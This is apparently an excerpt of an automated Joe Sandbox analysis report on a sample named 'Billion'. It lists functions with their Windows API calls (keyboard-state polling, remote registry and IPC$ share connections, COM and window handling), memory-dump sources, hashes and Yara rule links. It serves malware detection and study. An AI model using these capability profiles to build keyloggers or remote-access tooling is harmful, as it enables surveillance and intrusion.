                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                                          • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                                          • Opcode ID: d1ddd32e6c2788c148da05cd822187f7df4651fc1549e8e238c09e78a44debad
                                                                                                                                                                                                                                                                                                          • Instruction ID: e868a5bae5915a453227fd210b07df2d2196ac90692ffacc8ec9614343ac9f07
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1ddd32e6c2788c148da05cd822187f7df4651fc1549e8e238c09e78a44debad
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5311A331A5025D79DB20A7A6DC4AEFF7A7CFFD2B54F40042A7901E20D0EBA05A45C5A1
                                                                                                                                                                                                                                                                                                          Function 0019A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0019A9D9
                                                                                                                                                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0019AA44
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 0019AA64
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 0019AA7B
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 0019AAAA
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 0019AABB
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 0019AAE7
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 0019AAF5
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0019AB1E
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 0019AB2C
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 0019AB55
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 0019AB63
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 27e3292dadf4227440ff6b7d5b4aee699f165ee3d4b75ce154b7dc3715a4f112
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9582d0300f70eca083f3a3cf76386aa1ffce27dfc3a6e3e843ba17b990b95894
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27e3292dadf4227440ff6b7d5b4aee699f165ee3d4b75ce154b7dc3715a4f112
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9512920A087882AFF35D7649950BEABFF59F11344F894599D5C20B1C2DB64AB4CC7E3
                                                                                                                                                                                                                                                                                                          Function 0019662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00196649
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00196662
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 001966C0
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 001966D0
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 001966E2
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00196736
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00196744
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00196756
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00196798
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 001967AB
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001967C1
                                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 001967CE
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e302e7f07dd1d86b40d785eebe8b6624107db440316bb1766a1dd4cecab78f32
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3b34ccf2de7d673f03a87c932513a05d10ce72b09472f10e886b822a2b36fc3f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e302e7f07dd1d86b40d785eebe8b6624107db440316bb1766a1dd4cecab78f32
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF511F75A00215AFDF18CFA8DD85AAEBBB5FB48314F108129F519E7690D770AD44CB60
                                                                                                                                                                                                                                                                                                          Function 00132128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00132234: GetWindowLongW.USER32(?,000000EB), ref: 00132242
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00132152
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: fab0b5668ca1f34bea7a9d8dce15f69fef7a40c514a3e591809c1034e0692ebe
                                                                                                                                                                                                                                                                                                          • Instruction ID: 82bc51069d95a94921705da5bff6e7b2968e083ced2c7f9b4e41a9f514739a22
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fab0b5668ca1f34bea7a9d8dce15f69fef7a40c514a3e591809c1034e0692ebe
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D341B431100644AFDB246F38AC48FBA3BB5AB56730F154255FAB6872E1C731DD82EB11
                                                                                                                                                                                                                                                                                                          Function 001313A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 001728D1
                                                                                                                                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001728EA
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001728FA
                                                                                                                                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00172912
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00172933
                                                                                                                                                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001311F5,00000000,00000000,00000000,000000FF,00000000), ref: 00172942
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0017295F
                                                                                                                                                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001311F5,00000000,00000000,00000000,000000FF,00000000), ref: 0017296E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 1268354404-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 93341bfed9d4997f3d3fc9d6b85300c833d70e3f63bc6a9b38ce11a656ab837e
                                                                                                                                                                                                                                                                                                          • Instruction ID: a4d9026d67be918caa153e21768a83def8b784f121c10461628242da05b7ecd6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93341bfed9d4997f3d3fc9d6b85300c833d70e3f63bc6a9b38ce11a656ab837e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F518530600309EFDB24DF25DC49FAA7BB5FB58724F208529FA46976A0DB70E891DB50
                                                                                                                                                                                                                                                                                                          Function 0019A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00180D31,00000001,0000138C,00000001,00000000,00000001,?,001AEEAE,00202430), ref: 0019A091
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,00180D31,00000001), ref: 0019A09A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00180D31,00000001,0000138C,00000001,00000000,00000001,?,001AEEAE,00202430,?), ref: 0019A0BC
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,00180D31,00000001), ref: 0019A0BF
                                                                                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0019A1E0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                          • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9fe920d3869ad238cfe630813f1cb3f7b5035cbdbbf82601c477706f63105444
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3b192b3f35ad5ce3e256d11f3b875a1f4b6ec118d268c151a5ed059e39766898
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fe920d3869ad238cfe630813f1cb3f7b5035cbdbbf82601c477706f63105444
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01415E7290421DAACF04FBE0DD86DEEB778AF28344F500065F605B6092EB756F49CBA1
                                                                                                                                                                                                                                                                                                          Function 00190FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00191093
                                                                                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001910AF
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001910CB
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001910F5
                                                                                                                                                                                                                                                                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0019111D
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00191128
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0019112D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                          • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                                          • Opcode ID: afed5f6e031d0c3b7a13ff910c39e3c1634d9c6e7adb8544d270ac22fbbd375f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6e5bcad0e933dc6a1548225783d397c13cc94a236566cf93188c6f5a4e949012
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afed5f6e031d0c3b7a13ff910c39e3c1634d9c6e7adb8544d270ac22fbbd375f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C41E572C10229BBCF11EBA4EC85DEEB7B8FF14750F044169FA01A2161EB719E44CB50
                                                                                                                                                                                                                                                                                                          Function 001C4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 001C4AD9
                                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 001C4AE0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 001C4AF3
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 001C4AFB
                                                                                                                                                                                                                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 001C4B06
                                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 001C4B10
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 001C4B1A
                                                                                                                                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 001C4B30
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 001C4B3C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                                                                                          • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0d4fbbcfae92a8b216c76ed10aa8076c47c710288e58ce95fafbe25201272684
                                                                                                                                                                                                                                                                                                          • Instruction ID: b0dd82560453b1735d6ece085f2a36dec927eff9b9346d8b6ed9deb394afd276
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d4fbbcfae92a8b216c76ed10aa8076c47c710288e58ce95fafbe25201272684
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55315A72100215BBDF219FA4EC08FDA3FA9FF19724F110229FA15A61A0C735D860DBA4
                                                                                                                                                                                                                                                                                                          Function 001B468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 001B46B9
                                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 001B46E7
                                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001B46F1
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001B478A
                                                                                                                                                                                                                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 001B480E
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 001B4932
                                                                                                                                                                                                                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 001B496B
                                                                                                                                                                                                                                                                                                          • CoGetObject.OLE32(?,00000000,001D0B64,?), ref: 001B498A
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 001B499D
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001B4A21
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001B4A35
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8cc934d96e7d73230d9e5dd9cb5cc7c93985acc4e1c0c50762aaf81a031db89a
                                                                                                                                                                                                                                                                                                          • Instruction ID: fe07c923613d26ac420171bcaaec7da091047719889a35f125e1cc2fb255c693
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cc934d96e7d73230d9e5dd9cb5cc7c93985acc4e1c0c50762aaf81a031db89a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CC13771608301AFD700DF68C8849ABBBE9FF89748F10895DF9899B211DB31ED45CB52
                                                                                                                                                                                                                                                                                                          Function 001A84DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 001A8538
                                                                                                                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001A85D4
                                                                                                                                                                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 001A85E8
                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(001D0CD4,00000000,00000001,001F7E8C,?), ref: 001A8634
                                                                                                                                                                                                                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001A86B9
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 001A8711
                                                                                                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 001A879C
                                                                                                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001A87BF
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 001A87C6
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 001A881B
                                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001A8821
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
